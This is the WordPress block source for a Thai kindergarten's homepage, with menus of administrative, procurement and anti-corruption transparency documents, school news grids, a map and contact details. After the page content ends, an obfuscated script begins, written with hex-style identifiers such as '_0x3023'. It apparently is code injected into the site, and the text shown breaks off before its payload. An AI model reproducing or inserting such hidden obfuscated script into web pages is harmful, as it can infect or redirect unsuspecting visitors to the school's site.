data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1_OWLmL8dNlhDoQ0UR8jPN_Xxi6zx20T1/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1_OWLmL8dNlhDoQ0UR8jPN_Xxi6zx20T1/view?usp=drive_link\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1H4PRZlpAa4ZD6uq6Ew5Wx3nLXGcUNa09/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><code><a href=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\" data-type=\"link\" data-id=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\">Q&amp;A</a></code></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</strong></td></tr><tr><td><strong>รายงานผลการดำเนินงานประจำปี</strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong>คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติการให้บริการ</strong></td></tr><tr><td><strong><a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">E-Service</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการบริหารและพัฒนาทรัพยากรบุคคล</strong></td></tr><tr><td><strong>รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</strong></td></tr><tr><td><strong>การเปิดโอกาสให้เกิดการมีส่วนร่วม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong>การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_91838d-0f\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://forms.gle/ogsMCed1YfypogeK8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"https://forms.gle/ZyUhBS2TYmZiZVPR6\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"https://forms.gle/6upfY9jUcbu2kPti8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return 